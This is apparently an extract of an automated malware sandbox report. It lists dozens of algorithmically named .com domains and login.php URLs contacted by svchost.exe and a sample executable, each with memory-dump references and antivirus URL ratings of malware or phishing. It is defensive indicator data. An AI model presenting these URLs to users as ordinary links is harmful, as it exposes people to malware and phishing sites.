                                                                                                                                                                  ganypeb.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    vopymit.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      vowyguf.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        pupytiq.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          lymyfoj.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            vowyzuf.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              gatyruw.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                qebynyg.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  puzymev.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    pupymol.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      vojycif.com
                                                                                                                                                                                      unknown
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qexyryl.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1714130873.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vowyrif.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vowydef.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qekyvup.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qexynyq.com/login.phpsvchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lysyvax.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://gaqycos.com/svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyryman.com/login.phpsvchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916407909.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1939129904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906406561.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902776073.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903173988.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910676982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vocyruk.com/login.phpsvchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qexyfuq.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1893123903.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649079219.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvymej.com/login.phpsvchost.exe, 00000002.00000003.1644432968.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641638875.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyryled.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661492032.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2689279210.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585226156.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590472054.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2682843779.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galydyw.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lygysij.com/login.phpsvchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2695107852.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600938466.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
00000002.00000003.2080134372.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1952895401.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663281974.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puzybil.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885626689.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1647696976.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1895985913.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885477065.00000000033FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyvynid.com/login.phpsvchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://vojybim.com/login.phpsvchost.exe, 00000002.00000003.1876769792.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951119798.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1958180537.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558796542.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2663518628.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639886879.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641230114.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641383897.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699805037.0000000005AF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1640262678.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639444384.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878814703.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638844020.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1880572377.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649417555.00000000008F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lykyfen.com/http://lykyfen.com/Hsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://puvymul.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590845275.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589828940.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589542688.000000000088E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://galyhib.com/login.phpsvchost.exe, 00000002.00000003.1681368942.000000000CC50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://ganykaz.com/login.phpsvchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qetylyv.com/svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qegyfyp.com/login.phpsvchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1738011948.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604481381.0000000003307000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lyxygax.com/login.phpsvchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://qexyhuv.com/login.phpC:svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1794341844.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1792384862.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929571849.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1951392830.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881921461.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1942895681.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699419339.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889082302.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1808589587.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1823613650.000000000CC14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          unknown
